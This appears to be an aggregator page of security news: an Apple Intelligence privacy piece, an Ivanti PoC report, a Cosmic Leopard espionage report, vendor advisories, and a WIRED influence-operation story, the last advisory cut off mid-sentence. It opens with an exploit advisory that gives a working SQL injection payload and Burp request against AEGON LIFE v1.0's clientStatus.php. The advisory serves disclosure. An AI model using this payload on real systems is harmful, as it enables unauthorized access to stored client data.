AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

Apple's guarantee of privacy on every AI transaction could influence trustworthy AI deployments.

Source: OleCNX via Alamy Stock Photo

Apple has long styled itself as the company that cares about privacy, and it continues to tout its privacy bona fides with Apple Intelligence.

At this week's Worldwide Developer Conference, the company announced Apple Intelligence, its secure AI system, and plans to integrate AI across its devices and applications. The AI features will be used to upgrade personal assistant features in Apple devices and provide assistance with writing and image manipulation.

While a lightweight AI model runs locally on Apple devices, more complex queries will go to the cloud. Apple will assess the complexity and computing power required by an AI query and decide whether to process it on device or send it to the cloud. Data won’t leave the device if it is processed on device, and layers of security protect the information sent to the cloud.

Within this secure AI system, user data is not visible to anyone, even Apple, and is deleted once a query is answered, the company said.

"Your data is never stored or made accessible to Apple. It's used exclusively to fulfill your request," said Craig Federighi, senior vice president of software engineering at Apple, during a WWDC keynote.

**Trusted AI Deployments?**

Apple's guarantee of privacy on every AI transaction — whether on-device or in the cloud — is ambitious and could influence trustworthy AI deployments.

Apple's hardware and software implementation to guarantee privacy on every AI transaction sets a high bar on zero-trust infrastructure that competitors may try to match, says James Sanders, an analyst at chip research firm TechInsights.

Sanders notes there is a "growing trust problem" with LLMs, especially as top AI providers collect information from users to train large-language models or improve services. Google collects user data from across its vast portfolio of products to boost its capabilities. It also includes human reviewers to evaluate answers with the ultimate goal to improve its Gemini AI service.

Apple did not announce its own AI infrastructure and instead will be integrating with OpenAI. Apple left open the possibility of working with others as well. Users will be prompted to agree to send user data to OpenAI.

"I do wonder to what extent this is going to put pressure on Microsoft to adopt a similar method," Sanders says.

**Building an AI Walled Garden**

As part of its investments, the company has built a trustworthy cloud infrastructure called Private Compute Cloud with new servers and chips to handle AI queries that demand more computing power. Apple's secure boot and secure enclaves protect data.

"These models run on servers … specially created using Apple silicon. These Apple silicon servers offer the privacy and security of your iPhone from the silicon on up," Apple’s Federighi said.

Private data can be easily stolen en route or from the cloud, but Apple is using the latest hardware and software techniques to protect the data, said Matthew Green, associate professor at Johns Hopkin’s computer science department. Apple devices generate encryption keys, which authenticates devices and cloud connections. The request is then sent to a secure enclave on Apple's servers, where the requests are processed.

Apple is also taking a serverless approach in which data is deleted once the answer is sent back. New keys are generated each time a system reboots. The operating system also has an attestation system to verify users and software images.

"Specifically, it signs a hash of the software and shares this with every phone/client. If you trust this infrastructure, you'll know it's running a specific piece of software," Green said.

Apple controls nearly every major piece of software and hardware in its infrastructure, which makes it easier for them to build a strong privacy wall around its AI service, said Alex Matrosov, CEO of security company Binarly.io.

“I really liked how they frame all the requirements and specifically use their own silicon. Once they control everything, they can guarantee the chain of trust from the silicon to the cloud,” Matrosov said.

Rival providers don’t have nearly the same level of control over their AI infrastructure. Unlike Apple, they can’t lock down security as queries pass through various hardware and software layers, Matrosov says. For example, OpenAI and Microsoft process queries through GPUs from Nvidia, which handles vulnerability discovery and patching.

"If Apple sets the standard, the effect will be 'why I should buy Android if I don’t care about the privacy.' The next step will be Google following up and trying to maybe implement or do the similar thing," Matrosov said.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Apple's AI Offering Makes Big Privacy Promises

A new month, a new high-risk Ivanti bug for attackers to exploit — this time, an SQL injection issue in its centralized endpoint manager.

Source: Phichak via Alamy Stock Photo

Researchers have developed a proof-of-concept (PoC) exploit for a critical vulnerability in Ivanti Endpoint Manager that was recently disclosed — potentially setting the stage for mass exploitation of the devices.

CVE-2024-29824, an SQL injection bug, was first discovered by an independent researcher and sold to Trend Micro's Zero Day Initiative (ZDI). ZDI informed Ivanti of the issue on April 3.

It affects the company's centralized endpoint management solution, an attractive target for any hacker interested in compromising many devices across an organization from one launch point. The issue allows unauthenticated attackers to perform remote code execution (RCE) in the program, earning it a critical 9.8 out of 10 CVSS score.

"Endpoint Manager is usually elevated, so this really allows you to take over an Ivanti system," says Dustin Childs, head of threat awareness at ZDI. "From there, they would be able to affect other systems and do whatever you're using the Endpoint Manager to do."

The specific flaw lay in "RecordGoodApp," a method within a dynamic link library (DLL) file called "PatchBiz," contained within the program's core server. As outlined in a new blog post from Horizon3.ai, which published the PoC on GitHub, an attacker can take advantage of RecordGoodApp's very first string, which does not sufficiently validate user input data before constructing SQL queries. They demonstrated as much by sending a "fairly trivial" request to an endpoint handling events, convincing it to run Windows Notepad.

**Ivanti's Response**

Few organizations in cybersecurity history have been taken to task like Ivanti this year. Initially there were a couple of zero-day vulnerabilities, then another, then a whole lot more. Patches rolled in slowly and exploits skyrocketed, including some especially high-profile cases. Then, just as the bad press was finally starting to die down, this latest vulnerability arrived, equal in posing risk to corporations as any that had come before.

The good news: Childs emphasizes that, despite Ivanti's recent troubles, it handled this latest vulnerability by the book.

"It's not like we had to convince them \[to patch\]. We reported it to them, and they immediately got on it. They produced a patch within six weeks. That's about as good as you're going to see," he says. "So yes, they've had a lot of security problems this year, but they have made tremendous strides in addressing those problems in a very timely manner."

Ivanti published a patch for CVE-2024-29824 alongside its disclosure on May 24. Customers who haven't yet would be well advised to implement it as soon as possible, since threat actors have a history of piling on Ivanti vulnerabilities anyway, and an available, working PoC will likely spur them on further.

Besides patching, organizations can also focus on keeping their management interfaces protected from the wider Web. "Make sure that if your Endpoint Manager is Internet accessible, you restrict it to some very specific IP addresses that are \[trusted\]," Childs says.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

PoC Exploit Emerges for Critical RCE Bug in Ivanti Endpoint Manager

Against a backdrop of political conflict, a years-long cyber-espionage campaign in South Asia is coming to light.

Source: Frank Nowikowski via Alamy Stock Photo

A Pakistani threat actor has been spying on Indian government-associated entities for at least six years now.

A new report from Cisco Talos has collated years of cyber espionage by a group it calls "Cosmic Leopard," under the umbrella title "Operation Celestial Force." The Pakistan-based Cosmic Leopard overlaps with but as yet remains distinct from the threat actor known as Transparent Tribe. Cosmic Leopard's attacks focus on espionage and surveillance against individuals and organizations associated with India's government and defense sectors, as well as related technology companies.

"What we're seeing is constant, persistent efforts to infect targets of interest, and establish long-term access," says Asheer Malhotra, Cisco outreach researcher. "I'm pretty sure that the threat actors themselves don't know specifically what they're looking for. The intention here is to get as much data as they can, so that they can analyze it and then figure it out at a later stage."

**Operation Celestial Force**

Signs of Cosmic Leopard activity date back to 2016, when it created a Windows version of its GravityRAT Trojan.

Since then, Malhotra says, "We've seen a constant evolution in everything they do, basically."

In 2019, for example, the group developed its HeavyLift malware loader, and Android versions of GravityRAT for targeting mobile devices. MacOS, too. "We've also seen a constant evolution in the TTPs \[tactics, techniques, and procedures\] used by the threat actor. They used to send out phishing messages; now they establish conversations with victims over social media channels. At the same time, they're setting up new infrastructure which they can use to outrun detection," he explains.

In all, a current Celestial Force attack will look something like this:

First, a spear-phishing email or social media message arrives, containing a malicious document or, more often, a link. The link will seem like a website for downloading a legitimate Android application that, in fact, masks GravityRAT or HeavyLift.

GravityRAT is a fairly standard but powerful mobile Trojan. It can read and delete SMS messages, call logs, and files as well as other device information — about the SIM card, phone number, IMEI, manufacturer, network operator, location, and more.

HeavyLift is an executable masked as a legitimate installer. Typically, it installs both a harmless decoy application and a malicious one on the device. The malicious component can gather and exfiltrate a variety of system data, download further payloads, and check if it's running in a virtual machine.

It doesn't have to do any of that, however, to be effective.

"HeavyLift has a component that can download and run additional malware on the victim system, but it also gives the victim the ability to upload data to the threat actors' cloud," Malhotra explains. In some scenarios, the threat actor simply tells a target over social media about their cloud storage application. "The threat actor is being upfront about it. They say this is a cloud storage application, you can store all of your data in it. And once the target starts uploading all of their data, they have access to it, so they don't need to go in and steal from them."

It works so well, says Cisco lead security researcher Vltor Ventura, because "If you go to the site, if you go through the UI, it's really, really well done. Even while we were investigating the malware, it seemed almost like a legitimate application. It started a discussion between us — like, OK, is this really malicious or not?"

**Preventing Infections**

Luckily, steering clear of these attacks on mobile devices is simple: only download software from authorized app stores (for Android, that's Google Play). "Unless the attacker uses a zero-day, or n-day if the system is not updated, that's pretty much the only way they can get into the Android ecosystem," Ventura notes.

Windows computers lack this simple fix, but they have an advantage all their own.

"When you think about Android, organizations don't have that much visibility to what's going on these devices. It's a harder environment for organizations to control. With laptops, there is better visibility," Ventura explains.

With that extra visibility, organizations can apply layered security to prevent one employee's wayward click from becoming an organizationwide issue.

"When people get a link or when they get a file, they want to see what's inside," he says. Rather than denying reality, "we need to go to the next level, and prevent that \[decision\] from becoming something much worse."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Pakistani Hacking Team 'Celestial Force' Spies on Indian Gov't, Defense

Alignment between these domains is quickly becoming a strategic imperative.

Source: Panther Media GmbH via Alamy Stock

COMMENTARY

With an increasingly complex threat landscape and the progression of threat-actor tactics, effective cybersecurity is non-negotiable. At the same time, staffing challenges and an uncertain economy have made it increasingly challenging to manage your attack surface and keep would-be threat actors at bay.

That's not for lack of effort — or expenditure. Gartner forecasts that the world will spend $215 billion on risk management and cybersecurity in 2024. That's a 14% increase over 2023. Gartner expects that expenditures for IT will reach a whopping $5.1 trillion in 2024.

Amid all this, companies are striving for disruptive innovation and progress while keeping a close eye on budgets. Many workers are feeling spread thin, with more data and endpoints than ever and not enough qualified talent to be found. As a chief information officer (CIO), I can attest that I've seen this crunch particularly within the global IT space. This is not a good moment for IT to be stressed out and overworked. The stakes are simply too high.

So, how can organizations mitigate threats while maintaining momentum?

It's time to finally break down the silos between IT and security. That starts by fostering alignment between the CIO and chief information security officer (CISO).

**Streamlined, Secure — or Both?**

Individually, CISOs and CIOs are powerful forces with a lot on their plates — and a lot on the line. Together, they could be unstoppable. However, historically, organizational structures have relegated CISOs and CIOs to separate domains with distinct — and occasionally contradictory — objectives.

**Access, Please: The CIO Imperative**

For many CIOs, it's common to be focused on streamlining and efficiency, especially given staffing challenges. Additionally, CIOs and IT teams work to ensure continuous access to optimized tools that help employees get their jobs done. Sixty-one percent of IT professionals admit that negative technology experiences directly impact their morale, underscoring the palpable connection between tech efficiency and employee engagement.

Lack of access to the right tools can contribute to "shadow IT." Conversely, streamlined, efficient operations enhance speed and elevate the digital employee experience.

**Standing Guard: The CISO Imperative**

Meanwhile, my peers in the CISO role dial in to ensure organizations are as secure as possible. This is a critical and constantly moving target, as threat actors continue to find new avenues of attack. Effective cybersecurity prevents all manner of problems, ranging from the inconvenient (unexpected downtime) to the catastrophic (a major breach).

I have an enormous amount of respect for the CISO role, as should everyone impacted by security. (And that's all of us.) In 2022, the average cost of a single data breach was $4.5 million — not counting ransomware costs. Meanwhile, nearly 87% of businesses grapple with a shortfall in IT security staff. This talent crunch severely threatens organizations’ defenses against evolving cyber threats.

**Exploring the Overlap**

Both CIO and CISO roles seek to optimize business outcomes, though we often take differing approaches. "Streamlined" and "secure" are frequently mutually exclusive, particularly if your organization lacks the right tools.

There are several areas impacting both IT and security. Just two include:

*   Influx of devices and data: It's anticipated that more than 180 zettabytes of data will be floating around by 2025. If you thought we were already facing a data firehose, you haven't seen anything yet. The more data produced, the more streamlined operations must be to manage relevant data effectively — and the more importance must be placed on data protection.
    

*   Shifting work environments posing challenges: The mix of remote, hybrid, and in-person work environments — plus the increasing reliance on personal devices used to access company data — makes things more challenging for both IT and security.
    

Problems like these aren't theoretical — they’re real. According to Duke University research, "more than 80 percent of U.S. companies indicate their systems have been successfully hacked in an attempt to steal, change or make public important data." Meanwhile, the digital employee experience is more critical than ever in the battle to attract, engage, and retain top talent — so any tools and policies must be user friendly and secure.

I like to think of these challenges as shared opportunities. 

**Unlock the Collaborative Potential of CIOs and CISOs**

This is where alignment comes in. IT and security may have been siloed, but that could change. The past few years have shown change is not only possible but essential for survival. 

Breaking down the silos between your IT and security leaders doesn't diminish their roles, it elevates them.

Collaborative IT and security leaders, and their teams, enjoy the benefits of:

*   Financial optimization through consolidation: Streamlining vendor and technology portfolios for optimized spending and resource utilization.
    

*   Elevated employee engagement: Eradicating shadow IT and fortifying digital business for heightened engagement and security. 
    

*   Heightened enterprise resilience: Bolstering cybersecurity measures to curtail risks and fortify the organizational backbone.
    

Fostering alignment between these teams will vary, but there are a few universal principles to keep in mind:

*   Loop in your applicable executive(s), e.g., your CEO, from the start. They should be on board with and involved in facilitating this alignment.
    

*   Clarify objectives and define roles. Seek commonalities with your counterpart to identify overlap and gaps. 
    

*   Make yourself open for regular communication and collaboration — and find out if there are cross-training initiatives available.
    

*   In collaboration with applicable executives, adopt a unified approach to performance metrics, reporting mechanisms, risk management, data governance, and compliance.
    

*   Work together when making decisions on technology adoption, resource allocation, and budgeting.
    

*   Tooling should be a shared responsibility to ensure coverage and observability are always meeting key performance indicators (KPIs).
    

The endgame with these tactics is a more efficient operation to make life easier for both parties. Worth noting: Intelligent hyperautomation can be a massive benefit in streamlining processes and amplifying operational efficiency.

IT and security alignment is a strategic necessity. This collaborative effort fosters mutual accountability and improves overall security by eliminating data silos that hinder response times and hide crucial insights.

**About the Author(s)**

Chief Information Officer, Ivanti

Robert Grazioli is chief information officer (CIO) of Ivanti, responsible for all of its global IT systems and SaaS Operations, including the integration of Ivanti acquisitions over the past two years. Bob originally joined Ivanti in June 2020 as vice president of SaaS operations. Bob brings more than 25 years of global experience spanning the financial services and the software industry. He has been involved in some of the biggest software acquisitions in the industry over the past 10 years and has been responsible for some of the largest SaaS offerings in the industry. In addition, Bob has oversight of Customer Zero, taking Ivanti’s SaaS operations to the next level through leveraging our own learnings to benefit the needs of our customers.

Why CIO &amp; CISO Collaboration Is Key to Organizational Resilience

Apple Security Advisory 06-10-2024-1 - visionOS 1.2 addresses bypass, code execution, integer overflow, out of bounds access, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-06-10-2024-1 visionOS 1.2

visionOS 1.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214108.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreMedia  
Available for: Apple Vision Pro  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27817: pattern-f (@pattern_F_) of Ant Security Light-Year Lab

CoreMedia  
Available for: Apple Vision Pro  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-27831: Amir Bazine and Karsten König of CrowdStrike Counter  
Adversary Operations

Disk Images  
Available for: Apple Vision Pro  
Impact: An app may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27832: an anonymous researcher

Foundation  
Available for: Apple Vision Pro  
Impact: An app may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27801: CertiK SkyFall Team

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: The issue was addressed with improved checks.  
CVE-2024-27836: Junsung Lee working with Trend Micro Zero Day Initiative

IOSurface  
Available for: Apple Vision Pro  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27828: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple Vision Pro  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory protections  
Description: The issue was addressed with improved memory handling.  
CVE-2024-27840: an anonymous researcher

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-27815: an anonymous researcher, and Joseph Ravichandran  
(@0xjprx) of MIT CSAIL

libiconv  
Available for: Apple Vision Pro  
Impact: An app may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2024-27811: Nick Wellnhofer

Messages  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-27800: Daniel Zajork and Joshua Zajork

Metal  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-27802: Meysam Firouzi (@R00tkitsmm) working with Trend Micro  
Zero Day Initiative

Metal  
Available for: Apple Vision Pro  
Impact: A remote attacker may be able to cause unexpected app  
termination or arbitrary code execution  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-27857: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Safari  
Available for: Apple Vision Pro  
Impact: A website's permission dialog may persist after navigation away  
from the site  
Description: The issue was addressed with improved checks.  
CVE-2024-27844: Narendra Bhati of Suma Soft Pvt. Ltd in Pune (India),  
Shaheen Fazim

WebKit  
Available for: Apple Vision Pro  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: The issue was addressed by adding additional logic.  
WebKit Bugzilla: 262337  
CVE-2024-27838: Emilio Cobos of Mozilla

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 268221  
CVE-2024-27808: Lukas Bernhard of CISPA Helmholtz Center for Information  
Security

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improvements to the file  
handling protocol.  
CVE-2024-27812: Ryan Pickren (ryanpickren.com)

WebKit  
Available for: Apple Vision Pro  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: This issue was addressed with improvements to the noise  
injection algorithm.  
WebKit Bugzilla: 270767  
CVE-2024-27850: an anonymous researcher

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution  
Description: An integer overflow was addressed with improved input  
validation.  
WebKit Bugzilla: 271491  
CVE-2024-27833: Manfred Paul (@_manfp) working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution  
Description: The issue was addressed with improved bounds checks.  
WebKit Bugzilla: 272106  
CVE-2024-27851: Nan Wang (@eternalsakura13) of 360 Vulnerability  
Research Institute

WebKit Canvas  
Available for: Apple Vision Pro  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: This issue was addressed through improved state management.  
WebKit Bugzilla: 271159  
CVE-2024-27830: Joe Rutkowski (@Joe12387) of Crawless and @abrahamjuliot

WebKit Web Inspector  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 270139  
CVE-2024-27820: Jeff Johnson of underpassapp.com

Additional recognition

ImageIO  
We would like to acknowledge an anonymous researcher for their  
assistance.

Transparency  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/HT214009  To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmZnfN8ACgkQX+5d1TXa  
IvoomBAA23557a2KB9vrRnWu5nGWe5qidODwqadX9qUbErqlx6Hm0IMcKEGlaNjc  
i1BKib0QXYgh9IVzwn0/Q6GZX9mncM1EKJfjPVHJjdMPAXue9Dec7PeuSr4mQHUD  
bVUh9TS+ejQo9w06AQRdVDOGRl3uXX1E90h4uMVUPOXLkiobYJMlEdU4OAAaJ2MV  
qJvfQsTyzRNy4ciaFpc+5opWmaFse1AueE+Sjz30ed9tEjbyHML+yoy39HqAMheT  
lECfaKGLp28XyxsKCKW8+F5j83R4Rwi7U0nLROiRSukrwzq+Gbi52n/BTBvlxTc3  
Ng/4drldksgm9Uu6M9rRQFSRFBFKulK9Zxrj3qUK4Q6HvCTB+N4/gE7Yf11TyxPl  
+HkwG/ScIw9S4bB88FhA8rYMKIGIlZfDfh8NHCx3Wc11LE+p6LzX2RxQNKaSjgnf  
c1+VHJ3SwX/2mbtBdfPJdu5Qr6ofhanpsCiczJP2FkuSVGCPVIoq8Vam75rrueLn  
SLCHqgVker14Z12Q3XYRjyQrsI8nftu0pGZdYruAfw93Od0tTuX6i7G9VopHPRor  
1Y6JevWkhAC54KGWDmB2SRc6e3AZRaiAE25QE6I3nwAwRUCo2JZEjoQWfxYry1l2  
G5lga3qFvcbyriNoJPUfcKU7EzPYurVbY5rqpnUFi+xTtz1iyEw=  
=9AfP  
-----END PGP SIGNATURE-----

Apple Security Advisory 06-10-2024-1

Democratic leader Hakeem Jeffries has joined US intelligence officials in ignoring repeated inquiries about Israel’s “malign” efforts to covertly influence US voters.

Federal lawmakers in the US have dodged repeated inquiries over the past week about a covert operation ordered by the Israeli government to artificially boost support among Americans for its war in Gaza. At the same time, senior White House officials charged with advising President Joe Biden on matters of national security are claiming to have no knowledge of the operation—first disclosed publicly more than four months ago.

The operation, formally tied to the Israeli government by a New York Times reporter last week, kicked off in October 2023 following the surprise attack by Hamas in southern Israel. Researchers internationally began work to expose the campaign in February, identifying a flood of “suspicious accounts” on US-based social networking apps, most masquerading as Americans avowing support for the Israeli military response.

In addition to eroding support for the United Nations Relief and Works Agency, which provides assistance to 5.6 million Palestinian refugees, a chief aim of the Israeli operation, researchers say, was to sway the opinions of Black Americans. Per the Times—which cited four current and former Israeli officials in confirming their government had commissioned the campaign—its primary targets included the account of US congressman Hakeem Jeffries, the leader of the Democrats in the House, among others who are “Black and Democratic.”

Accounts tied to the operation—many of which, at the time of writing, remain active on X, despite being suspended on other platforms—promoted a Black Lives Matter hashtag and shared images of Martin Luther King Jr. alongside fabricated quotes. A website created for the operation included articles with titles such as “The leaders of the Civil Rights Movement and Their Support of Jewish People and Israel.”

Several examples of accounts used in the operation, many of which were created weeks prior to the Hamas attack on October 7 that killed an estimated 1,200 people, advertised themselves as “Christian.” One of the stolen identities used in the operation, first identified by a researcher in Qatar, was that of Kyle Jean-Baptiste, an up-and-coming Broadway star who died in 2015 after falling from a fire escape.

**Got a Tip?**

_If you have information about the work of the intelligence community or its congressional overseers, contact Dell Cameron at dell\_cameron@wired.com or via Signal at dell.3030._

Multiple inquiries placed with senior members of Jeffries’ staff, including his communications director, Andy Eichar, have gone unacknowledged for nearly a week. WIRED has attempted to resolve whether Jeffries ever received notification of the operation from US intelligence while Congress was in the midst of debating $14 billion in funding to supplement Israel’s war effort.

Israeli forces have killed more than 36,000 Palestinians since Hamas’ October 7 attack, according to Gaza health officials’ estimates, including dozens last Thursday at a United Nations school compound, where the Israeli military is accused of making “improper use” of a US-made bomb.

With the exception of the White House’s National Security Council, which on Thursday claimed to have no knowledge of the operation, and Senate Intelligence Committee chair Mark Warner, whose office told WIRED it planned to request a briefing on the matter, press inquiries concerning Israel’s attempts to secretly influence US opinion on the war have been met with a stonewall.

It is unclear whether Biden may have received a briefing on the operation that included information not shared with his own national security advisers. Said a spokesperson for the National Security Council: “We take all allegations of foreign malign influence seriously.”

The Office of the Director of National Intelligence, led by Avril Haines—formerly No. 2 at the CIA—declined to say whether US intelligence had any knowledge of the operation prior to the June 5 New York Times’ story. It would not reveal whether it issued any notifications to Jeffries or any other US officials targeted by Israel.

The ODNI maintains what it calls a “disclosure framework” for notifying victims of influence operations connected with US elections. It is unclear, however, whether the ODNI considers the operation election-related, despite national elections approaching and the deep political divide among US voters over Congress’ support for the Israeli war effort.

Haines has previously spoken publicly on how US intelligence responds to this scenario: “When relevant intelligence is collected concerning a foreign influence operation aimed at our election,” she said, a “notification framework” exists to ensure “appropriate notice is given to those who are being targeted so that they can take action.”

Multiple attempts to solicit comment over the past week from the House Intelligence Committee have likewise gone unacknowledged by representatives Mike Turner and Jim Himes, the committee’s chair and ranking member, respectively. It is unclear whether they are taking steps similar to their Senate counterparts to investigate the matter.

Many of the Israeli operation’s fake posts were found to have been generated using ChatGPT, the digital assistant software developed by OpenAI, which is being integrated into everything from Apple’s new iPhones to the next Microsoft Windows operating system. Notably, OpenAI’s CEO, Sam Altman, was recently appointed an adviser to the Homeland Security Department. According to the agency, his role is to advise the US government on how to “prevent and prepare for AI-related disruptions.”

Both OpenAI and social media giant Meta have publicly confirmed that the operation was launched by a Tel Aviv–based company called Stoic. Neither US company, however, has disclosed having any knowledge of Stoic being commissioned by the Israeli government.

Oft described as an Israeli “campaign marketing firm,” Stoic is reminiscent of Russia’s Internet Research Agency, which similarly used fake accounts registered on social media to promote the Kremlin’s interests, namely by working to influence the outcome of the 2016 US presidential election. OpenAI disclosed earlier this month that Stoic had similarly been tracked using fraudulent accounts in an effort to influence the outcome of India’s recent elections.

Meta and OpenAI have not responded to requests for comment.

A US intelligence assessment published in February that identified threats from foreign countries accused of launching malign influence operations against the US references Israel dozens of times; however, it strictly portrays the Middle East ally as the victim of such campaigns.

The annual assessment, published by the ODNI three days after Israel’s “multi-platform deception operation” was first revealed publicly by Marc Owen Jones—an assistant professor of Qatar University specializing in disinformation—speaks only broadly of the influence efforts of US rivals and contains few if any details about any specific operations. The report mentions, for instance, that the Chinese government “reportedly targeted” US politicians on TikTok using accounts run by a propaganda office ahead of the 2022 midterm elections.

The revelation of Israel’s involvement follows months of hearings in Washington concerning the impact of what US intelligence calls “malign foreign influence campaigns.” Much of the focus by lawmakers centered on allegations that China might potentially manipulate TikTok to sway public opinion in the US.

Jeffries, who is rumored to be the Democratic party’s next choice to become Speaker of the House, was among the 360 US representatives to support taking drastic steps in April that may soon lead to a ban on TikTok in US app stores.

Jeffries has joined other US leaders in extending an invitation to Israeli prime minister Benjamin Netanyahu to address Congress next month. A letter from Jeffries and Senate minority leader Mitch McConnell to the prime minister last week read: “To build on our enduring relationship and to highlight America's solidarity with Israel, we invite you to share the Israeli government's vision for defending democracy, combatting terror, and establishing a just and lasting peace in the region.”

_Update 1 pm ET, June 11, 2024: Added additional details about the Israeli influence campaign._

US Leaders Dodge Questions About Israel’s Influence Campaign

It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 22.04 LTS

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems  
-   linux-oracle - Linux kernel for Oracle Cloud systems

Details

It was discovered that the ATA over Ethernet (AoE) driver in the Linux  
kernel contained a race condition, leading to a use-after-free  
vulnerability. An attacker could use this to cause a denial of service  
or possibly execute arbitrary code. (CVE-2023-6270)

It was discovered that a race condition existed in the AppleTalk  
networking subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-51781)

In the Linux kernel, the following vulnerability has been  
resolved: netfilter: nft_set_rbtree: skip end interval element from gc  
rbtree lazy gc on insert might collect an end interval element that has  
